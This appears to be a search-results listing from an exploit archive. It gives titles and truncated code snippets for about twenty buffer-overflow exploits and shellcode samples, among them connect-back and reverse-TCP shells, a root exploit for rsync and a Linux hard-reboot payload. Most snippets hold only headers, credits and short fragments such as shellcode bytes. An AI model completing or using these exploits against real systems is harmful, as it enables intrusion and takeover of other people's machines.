7260 matches found
Bifrost 1.2.1 - Remote Buffer OverFlow
No description provided by source. !/usr/bin/python2.7 By : Mohamed Clay import socket from time import sleep from itertools import izip, cycle import base64 import sys def rc4cryptdata, key: x = 0 box = range256 for i in range256: x = x + boxi + ordkeyi % lenkey % 256 boxi, boxx = boxx, boxi x =...
win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes
No description provided by source. 68 9D 61 F9 77 push 0x77C01345 B8 C7 93 C1 77 mov eax,msvcrt.system FF D0 call eax In msvcrt.dll at 0x77C01344 We have string .cmd, that's the trick. Code will work in WinXP SP3 Pro Rus, in other versions you'd better search the string and systemchar address for...
BSD x86 connect back Shellcode (81 bytes)
No description provided by source. / -------------- FreeBSD/x86 - connect back /bin/sh. 81 bytes ---------------- AUTHOR : Tosh OS : BSDx86 Tested on FreeBSD 8.1 EMAIL : [email protected] / include stdio.h include string.h include arpa/inet.h char shellcode =...
HP-UX FTPD Remote Buffer Overflow Exploit
No description provided by source. / theoretical exploit for hpux ftpd vulnerability / / not tested anywhere, needs tweaking / / c 2000 by babcia padlina ltd. [email protected] / include stdio.h include stdlib.h define NOPS 100 define BUFSIZE 1024 char shellcode = / HP-UX shellcode /...
Steamcast - (HTTP Request) Remote Buffer Overflow Exploit (SEH) (2)
No description provided by source. !/usr/bin/python Usage : steamcast.py victimeip Bug : SteamcastHTTP Request Remote Buffer Overflow Exploit SEH 2 Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln. Tested on : Xp sp2 fr Exploited by : His0k4 Greetings : All friends &...
Stanley T. Shebs Xconq 7.2.2 - Buffer Overflow Vulnerabilities in xconq
No description provided by source. source: http://www.securityfocus.com/bid/1495/info Xconq is a multiple player strategy game available for many unix platforms. It contains a number of buffer overflow vulnerabilities including the ability to overflow stack buffers with either the DISPLAY or the...
Cain & Abel <= 4.9.24 - .RDP Stack Overflow Exploit
No description provided by source. !/usr/bin/perl Cain & Abel = v4.9.24 .RDP Stack Overflow Exploit Exploit by SkD [email protected] ----------------------------------------------- Nothing much to say about this one. This works on an updated Windows XP SP3. On Vista this exploit is way easier th...
rsync <= 2.5.7 - Local stack overflow Root Exploit
No description provided by source. / rsync = 2.5.7 Local Exploit Saved EIP on stack is overwritten with address of shellcode in memory Generally rsync is not setuid or setgid so just a local shell is of no use So i used a portbinding shellcode as a PoC of a different attack vector. RET is...
RealPlayer 10 ".smil" File Local Buffer Overflow Exploit
No description provided by source. / RealPlayer .smil file buffer overflow Coded by nolimit@CiSO & Buzzdee greets to COREiSO & news & flare & class101 & ESI & RVL & everyone else I forget This uses a seh overwrite method, which takes advantage of the SEH being placed in multiple locations over th...
Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (3)
No description provided by source. / snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit by Russell Sanford [email protected] - www.code-junkies.net - Date: Nov 11, 2005 Description: A buffer overflow exists in the snort pre-preprocessor designed to detect encrypted Back Orifice ping...
Yahoo Player 1.0 - (.m3u) Buffer Overflow Exploit
No description provided by source. Title: Yahoo Player v1.0 .m3u Buffer Overflow Exploit direct EIP overwrite Date: 2010-03-07 Author: BombardMr. tro0oqy originally discovered it, and gave a SEH Version:1.0 Tested on: Windows XP SP2 CVE: my $file=crash.m3u; my $junkA=Ax2080; my...
x86 linux hard / unclean reboot (29 bytes)
No description provided by source.
x86 linux hard / unclean reboot (33 bytes)
No description provided by source.
Helix Server 11.0.1 - Remote Heap Overflow Exploit (win2k SP4)
No description provided by source. /usr/bin/python Remote exploit for the vulnerability in Helix server v11.0.1 as described at http://gleg.net/helix.txt The exploit spawns a shell on TCP port 4444 and connects to it. At the time of overflow we control EAX which is used in a call as follows...
Linux/x86 Reverse TCP Bind Shellcode (92 bytes)
No description provided by source. / Title : reversetcpbindshell 92 bytes Date : 16 May 2013 Author : Russell Willis [email protected] Tested on: Linux/x86 SMP Debian 3.2.41-2 i686 $ objdump -D reversetcpbindshell -M intel reversetcpbindshell: file format elf32-i386 Disassembly of section .text:...
Solaris 7.0/8 Xsun Buffer Overrun Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/1140/info A buffer overrun vulnerability exists in the Xsun X11 server, as shipped as part of Solaris 7 and 8 from Sun Microsystems. By supplying a long argument to the -dev option normally used to set the output device, ...
GhostScript PostScript File Stack Overflow Exploit
No description provided by source. Check Point Software Technologies - Vulnerability Discovery Team VDT Rodrigo Rubira Branco - rbranco noSPAM checkpoint.com GhostScript Stack Overflow bsd/x86/shellbindtcp - 214 bytes http://www.metasploit.com Encoder: x86/alphaupper AppendExit=false,...
ComponentOne VSFlexGrid 7 & 8 - "Archive()" method Remote Buffer Overflow Exploit
No description provided by source. Title: ComponentOne VSFlexGrid v. 7 & 8 Archive method Remote Buffer Overflow Exploit Date....................: 19-05-2010 Author..................: Ma3sTr0-Dz Location ...............: Algeria Software ...............: ComponentOne VSFlexGrid v. 7 & 8...
VCDGear 3.50 (.cue) - Stack Buffer Overflow Exploit
No description provided by source. !/usr/bin/ruby ''' Author: Provensec www.provensec.com [email protected] Tested on XP SP3 / Windows 7 Description: VCDGEAR 3.50 is prone to a stack-based buffer overflow vulnerability because the application fails to perform adequate boundary-checks on...
Jasc Paint Shop Pro 8 - Local Buffer Overflow Exploit (UNIVERSAL)
No description provided by source. / Software: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit UNIVERSAL Bug type: Local buffer overflow Exploitation method: SEH handler overwrite Description: When a crafted .PNG file is opened a stack buffer overflow occurs because of DEP a SEH handler is...